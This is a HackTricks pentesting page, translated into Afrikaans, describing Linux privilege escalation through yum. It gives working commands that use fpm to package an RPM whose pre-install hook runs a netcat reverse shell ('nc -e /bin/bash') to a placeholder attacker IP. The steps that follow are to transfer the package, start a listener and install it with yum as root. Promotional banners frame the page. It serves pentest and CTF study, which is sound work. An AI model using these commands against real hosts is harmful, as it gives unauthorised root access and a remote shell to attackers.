hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2024-02-11 02:07:06 +00:00

3.9 KiB

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Verdere voorbeelde rondom yum kan ook gevind word op gtfobins.

Uitvoering van willekeurige opdragte via RPM-pakkette

Kontroleer die omgewing

Om van hierdie vektor gebruik te maak, moet die gebruiker yum-opdragte kan uitvoer as 'n hoërbevoorregte gebruiker, d.w.s. root.

'n Werkende voorbeeld van hierdie vektor

'n Werkende voorbeeld van hierdie uitbuiting kan gevind word in die daily bugle kamer op tryhackme.

Verpak 'n RPM

In die volgende afdeling sal ek verpakking van 'n omgekeerde skulp in 'n RPM dek met behulp van fpm.

Die voorbeeld hieronder skep 'n pakkie wat 'n voor-installasie-trigger insluit met 'n willekeurige skrips wat deur die aanvaller gedefinieer kan word. Wanneer dit geïnstalleer word, sal hierdie pakkie die willekeurige opdrag uitvoer. Ek het 'n eenvoudige voorbeeld van 'n omgekeerde netcat-skulp gebruik vir demonstrasie, maar dit kan na wense verander word.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Die vang van 'n skulp

Deur die bogenoemde voorbeeld te gebruik en aan te neem dat yum uitgevoer kan word as 'n gebruiker met hoër bevoegdhede.

  1. Oordra die rpm na die gasheer.
  2. Begin 'n luisteraar op jou plaaslike gasheer soos die voorbeeld netcat luisteraar.
  3. Installeer die kwesbare pakkie yum localinstall -y exploited-1.0-1.noarch.rpm
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: